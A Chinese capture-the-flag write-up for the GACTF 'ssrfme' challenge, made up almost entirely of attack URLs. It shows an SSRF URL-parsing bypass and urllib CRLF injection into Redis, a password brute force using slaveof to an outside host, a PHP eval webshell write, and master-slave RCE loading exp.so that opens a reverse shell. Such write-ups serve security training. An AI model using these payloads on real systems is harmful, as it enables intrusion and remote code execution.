GACTF之ssrfme

  • A+
所属分类:逆向工程

点击蓝字 ·  关注我们

01

绕过url解析


http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/&rid=2&pid=1&title=


02

爆破内部端口


GACTF之ssrfme


03

存在注入



发现第二个web是urllib 对应版本存在CRLF注入
http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/?url=http://123.56.22.0:999

GACTF之ssrfme


03

爆破

爆破发现存在redis端口 6379,但是密码怎么都不对,结合题目说的提示推测可能是安全机制。
http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/?url=http://123.56.22.0:6378?%250D%250Aauth%2520123123%250D%250Ainfo%250D%250A1
服务器搭建测试 直接提交 有安全机制

GACTF之ssrfme

但是如果发送
http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/?url=http://123.56.22.0:6378?%250D%250Aauth%2520123123%250D%250Aset%2520A%2520evil%250D%250A
服务器无回显 但是A已经被设置为evil了 所以就不用管 先搞密码

爆破redis密码我是用的主从来做的,当密码正确会连接到我的vps

http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/?url=http://123.56.22.0:6377?%250D%250Aauth%2520123123%250D%250Aslaveof%2520123.56.22.0%25202323%250D%250A1

redis密码123456


GACTF之ssrfme


04

shell 失败尝试主从rce

写shell失败 可能是无权限 就不考虑计划任务了

http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/?url=http://123.56.22.0:6377?%250D%250Aauth%2520123123%250D%250Aset%2520A%2520%2520%253C%253Fphp%253b%2540eval%2528%2524_POST%255Bc%255D%2529%253B%253F%253E%250A%250D%250A%250D%250A%250d%250aconfig%2520set%2520dir%2520/tmp%250d%250aconfig%2520set%2520dbfilename%2520suanve.php%250d%250asave%250d%250apadding


尝试主从rce

参考https://blog.csdn.net/weixin_43610673/article/details/106457180

使用工具

https://github.com/xmsec/redis-ssrf

执行脚本不停的监听

while [ "1" = "1" ]do        python rogue-server.pydone


05

三次请求&反弹拿flag

准备好以后nc监听6663端口 依次发送三次请求

  

0x01 设置tmp目录


http://121.36.199.21:10804/?url=http://root:[email protected]0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250aconfig%2520set%2520dir%2520%252ftmp%250d%250a1



0x02 设置exp.so

http://121.36.199.21:10804/?url=http://root:[email protected]0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520123.56.22.0%25206666%250d%250aquit%250a1



0x03 加载so后执行反弹命令

http://121.36.199.21:10804/?url=http://root:[email protected]0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250amodule%2520load%2520%252ftmp%252fexp.so%250d%250asystem.rev%2520123.56.22.0%25206663%250d%250aquit%250d%250a1


服务器收到三次请求


GACTF之ssrfme


反弹拿到shell

GACTF之ssrfme


GACTF{to0_t0o_easy_SSRF101_1ace2020}


EDI安全

GACTF之ssrfme

扫二维码|关注我们

一个专注渗透实战经验分享的公众号

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: